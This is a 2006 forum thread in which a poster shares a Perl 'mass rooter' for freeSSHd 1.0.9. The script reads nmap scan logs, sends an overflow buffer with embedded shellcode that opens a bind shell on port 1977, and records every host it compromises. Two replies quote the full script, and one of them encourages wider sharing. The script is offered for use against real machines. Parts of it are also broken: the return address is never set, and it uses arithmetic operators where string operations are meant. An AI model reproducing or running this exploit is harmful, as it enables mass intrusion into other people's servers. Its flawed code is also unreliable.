freesshd 1.0.9 massr00ter

Discussion in 'Computer Security' started by cyberstorm, Jun 17, 2006.

  1. cyberstorm

    cyberstorm Guest

    Here is an freesshd massrooter it will be check and hack
    from the nmap portscan logs. Have Fun with
    this tool:

    #!/usr/bin/perl

    use Socket;
    use IO::Socket::INET;

    my $port = '22';
    my @banner = (22);
    my $info = "+++++++++++++++++++++++++++++++++++++++++++++\n".
    "+ +\n".
    "+ freeSSHd 1.0.9 Mass r00ter +\n".
    "+ +\n".
    "+ Author: cyberstorm +\n".
    "+ Contact: cyberstorm187[at]arcor.de +\n".
    "+ NON-PUBLIC!! Keep it PRIVATE!PRIVATE! +\n".
    "+ +\n".
    "+++++++++++++++++++++++++++++++++++++++++++++\n";

    my $shellcode =
    "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
    "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49".
    "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d".
    "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66".
    "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61".
    "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40".
    "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32".
    "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6".
    "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09".
    "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0".
    "\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff".
    "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53".
    "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff".
    "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64".
    "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89".
    "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab".
    "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51".
    "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53".
    "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6".
    "\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\xd0";

    print "$info";
    &usage if !@ARGV; &main;


    sub main {
    while (<>) {
    if (/^Interesting ports on.*\((\S+)\):/) {
    $ip = $1; $i++;
    } foreach $port (@banner) {
    if (/^$port\/(\w+)\s+open/) {
    $proto = $1; $p++;
    &banner($ip, $port, $proto);
    }
    }
    } &stats;
    }

    sub banner {
    my ($ip, $port, $proto) = @_;
    print "$ip:$port\t=> ";
    socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
    connect(SOCK, sockaddr_in($port, inet_aton($ip)));
    if ($port != 80) {
    $banner =<SOCK>;
    close(SOCK);
    print "$banner";
    } else {
    send(SOCK, "GET / HTTP/1.0\n\n", 0);
    @o = <SOCK>;
    close(SOCK);
    foreach (@o) {
    if (/Server:\s(.*)/) {
    $banner = $1;
    print "$banner";
    }
    }
    }
    if($banner != 'SSH-2.0-WeOnlyDo 1.2.7'){
    &exploit($ip,$port,$proto);
    }
    }

    sub exploit {
    my ($ip,$port,$proto) = @_;
    if ($check_before = IO::Socket::INET->new(PeerAddr => "$ip:22")){
    my $buff =
    "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48".
    "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00".
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde";

    my $buff = $buff + "A" * 1055;
    my $buff = $buff + $eip;
    my $buff = $buff + "yyyy";
    my $buff = $buff + "\x90" * 4;
    my $buff = $buff + $shellcode;
    my $buff = $buff + "B" * 19021 + "\r\n";

    print "[~] Try to connect to $ip\n";
    socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
    connect(SOCK, sockaddr_in($port, inet_aton($ip)));
    print "[~] Creating Buffer\n";
    send(SOCK, $buff, 0);
    close(SOCK);
    print "[~] Send Buffer\n";
    print "[~] checking ...\n";

    sleep(1);
    if ($check = IO::Socket::INET->new(PeerAddr => "$ip:1977")){
    print "[~] YoU got an Shell\n".
    "Connect over Telnet on Port 1977\n";
    open(OUTPUT, '>>freesshd.txt');
    print OUTPUT "$ip\n";
    close(OUTPUT);
    } else {
    print "Sorry, Dude !\n";
    }
    }
    }

    sub usage {
    print "freesshd.pl <infile>\n";
    }
    cyberstorm, Jun 17, 2006
    #1
    1. Advertising

  2. cyberstorm

    Geordie Guy Guest

    cyberstorm wrote:
    > Here is an freesshd massrooter it will be check and hack
    > from the nmap portscan logs. Have Fun with
    > this tool:
    >
    > #!/usr/bin/perl
    >
    > use Socket;
    > use IO::Socket::INET;
    >
    > my $port = '22';
    > my @banner = (22);
    > my $info = "+++++++++++++++++++++++++++++++++++++++++++++\n".
    > "+ +\n".
    > "+ freeSSHd 1.0.9 Mass r00ter +\n".
    > "+ +\n".
    > "+ Author: cyberstorm +\n".
    > "+ Contact: cyberstorm187[at]arcor.de +\n".
    > "+ NON-PUBLIC!! Keep it PRIVATE!PRIVATE! +\n".
    > "+ +\n".
    > "+++++++++++++++++++++++++++++++++++++++++++++\n";
    >
    > my $shellcode =
    > "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
    > "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49".
    > "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d".
    > "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66".
    > "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61".
    > "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40".
    > "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32".
    > "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6".
    > "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09".
    > "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0".
    > "\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff".
    > "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53".
    > "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff".
    > "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64".
    > "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89".
    > "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab".
    > "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51".
    > "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53".
    > "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6".
    > "\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\xd0";
    >
    > print "$info";
    > &usage if !@ARGV; &main;
    >
    >
    > sub main {
    > while (<>) {
    > if (/^Interesting ports on.*\((\S+)\):/) {
    > $ip = $1; $i++;
    > } foreach $port (@banner) {
    > if (/^$port\/(\w+)\s+open/) {
    > $proto = $1; $p++;
    > &banner($ip, $port, $proto);
    > }
    > }
    > } &stats;
    > }
    >
    > sub banner {
    > my ($ip, $port, $proto) = @_;
    > print "$ip:$port\t=> ";
    > socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
    > connect(SOCK, sockaddr_in($port, inet_aton($ip)));
    > if ($port != 80) {
    > $banner =<SOCK>;
    > close(SOCK);
    > print "$banner";
    > } else {
    > send(SOCK, "GET / HTTP/1.0\n\n", 0);
    > @o = <SOCK>;
    > close(SOCK);
    > foreach (@o) {
    > if (/Server:\s(.*)/) {
    > $banner = $1;
    > print "$banner";
    > }
    > }
    > }
    > if($banner != 'SSH-2.0-WeOnlyDo 1.2.7'){
    > &exploit($ip,$port,$proto);
    > }
    > }
    >
    > sub exploit {
    > my ($ip,$port,$proto) = @_;
    > if ($check_before = IO::Socket::INET->new(PeerAddr => "$ip:22")){
    > my $buff =
    > "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48".
    > "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00".
    > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde";
    >
    > my $buff = $buff + "A" * 1055;
    > my $buff = $buff + $eip;
    > my $buff = $buff + "yyyy";
    > my $buff = $buff + "\x90" * 4;
    > my $buff = $buff + $shellcode;
    > my $buff = $buff + "B" * 19021 + "\r\n";
    >
    > print "[~] Try to connect to $ip\n";
    > socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
    > connect(SOCK, sockaddr_in($port, inet_aton($ip)));
    > print "[~] Creating Buffer\n";
    > send(SOCK, $buff, 0);
    > close(SOCK);
    > print "[~] Send Buffer\n";
    > print "[~] checking ...\n";
    >
    > sleep(1);
    > if ($check = IO::Socket::INET->new(PeerAddr => "$ip:1977")){
    > print "[~] YoU got an Shell\n".
    > "Connect over Telnet on Port 1977\n";
    > open(OUTPUT, '>>freesshd.txt');
    > print OUTPUT "$ip\n";
    > close(OUTPUT);
    > } else {
    > print "Sorry, Dude !\n";
    > }
    > }
    > }
    >
    > sub usage {
    > print "freesshd.pl <infile>\n";
    > }
    >

    Keep it PRIVATE PRIVATE!!!
    By posting it to a news group LOL
    Geordie Guy, Jun 17, 2006
    #2
    1. Advertising

  3. cyberstorm

    imhotep Guest

    Geordie Guy wrote:

    > cyberstorm wrote:
    >> Here is an freesshd massrooter it will be check and hack
    >> from the nmap portscan logs. Have Fun with
    >> this tool:
    >>
    >> #!/usr/bin/perl
    >>
    >> use Socket;
    >> use IO::Socket::INET;
    >>
    >> my $port = '22';
    >> my @banner = (22);
    >> my $info = "+++++++++++++++++++++++++++++++++++++++++++++\n".
    >> "+ +\n".
    >> "+ freeSSHd 1.0.9 Mass r00ter +\n".
    >> "+ +\n".
    >> "+ Author: cyberstorm +\n".
    >> "+ Contact: cyberstorm187[at]arcor.de +\n".
    >> "+ NON-PUBLIC!! Keep it PRIVATE!PRIVATE! +\n".
    >> "+ +\n".
    >> "+++++++++++++++++++++++++++++++++++++++++++++\n";
    >>
    >> my $shellcode =
    >> "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
    >> "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49".
    >> "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d".
    >> "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66".
    >> "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61".
    >> "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40".
    >> "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32".
    >> "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6".
    >> "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09".
    >> "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0".
    >> "\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff".
    >> "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53".
    >> "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff".
    >> "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64".
    >> "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89".
    >> "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab".
    >> "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51".
    >> "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53".
    >> "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6".
    >> "\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\xd0";
    >>
    >> print "$info";
    >> &usage if !@ARGV; &main;
    >>
    >>
    >> sub main {
    >> while (<>) {
    >> if (/^Interesting ports on.*\((\S+)\):/) {
    >> $ip = $1; $i++;
    >> } foreach $port (@banner) {
    >> if (/^$port\/(\w+)\s+open/) {
    >> $proto = $1; $p++;
    >> &banner($ip, $port, $proto);
    >> }
    >> }
    >> } &stats;
    >> }
    >>
    >> sub banner {
    >> my ($ip, $port, $proto) = @_;
    >> print "$ip:$port\t=> ";
    >> socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
    >> connect(SOCK, sockaddr_in($port, inet_aton($ip)));
    >> if ($port != 80) {
    >> $banner =<SOCK>;
    >> close(SOCK);
    >> print "$banner";
    >> } else {
    >> send(SOCK, "GET / HTTP/1.0\n\n", 0);
    >> @o = <SOCK>;
    >> close(SOCK);
    >> foreach (@o) {
    >> if (/Server:\s(.*)/) {
    >> $banner = $1;
    >> print "$banner";
    >> }
    >> }
    >> }
    >> if($banner != 'SSH-2.0-WeOnlyDo 1.2.7'){
    >> &exploit($ip,$port,$proto);
    >> }
    >> }
    >>
    >> sub exploit {
    >> my ($ip,$port,$proto) = @_;
    >> if ($check_before = IO::Socket::INET->new(PeerAddr => "$ip:22")){
    >> my $buff =
    >> "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48".
    >> "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00".
    >> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde";
    >>
    >> my $buff = $buff + "A" * 1055;
    >> my $buff = $buff + $eip;
    >> my $buff = $buff + "yyyy";
    >> my $buff = $buff + "\x90" * 4;
    >> my $buff = $buff + $shellcode;
    >> my $buff = $buff + "B" * 19021 + "\r\n";
    >>
    >> print "[~] Try to connect to $ip\n";
    >> socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto));
    >> connect(SOCK, sockaddr_in($port, inet_aton($ip)));
    >> print "[~] Creating Buffer\n";
    >> send(SOCK, $buff, 0);
    >> close(SOCK);
    >> print "[~] Send Buffer\n";
    >> print "[~] checking ...\n";
    >>
    >> sleep(1);
    >> if ($check = IO::Socket::INET->new(PeerAddr => "$ip:1977")){
    >> print "[~] YoU got an Shell\n".
    >> "Connect over Telnet on Port 1977\n";
    >> open(OUTPUT, '>>freesshd.txt');
    >> print OUTPUT "$ip\n";
    >> close(OUTPUT);
    >> } else {
    >> print "Sorry, Dude !\n";
    >> }
    >> }
    >> }
    >>
    >> sub usage {
    >> print "freesshd.pl <infile>\n";
    >> }
    >>

    > Keep it PRIVATE PRIVATE!!!
    > By posting it to a news group LOL



    No, share, share, share!!!

    Im
    --
    *************************************
    Pass a Net Neutrality Law in the US!!!!

    Save the Internet:
    http://www.savetheinternet.com/

    Its our net:
    http://www.itsournet.org/

    *************************************
    imhotep, Jun 18, 2006
    #3
    1. Advertising

Want to reply to this thread or ask your own question?

It takes just 2 minutes to sign up (and it's free!). Just click the sign up button to choose a username and then you can ask your own questions on the forum.

Share This Page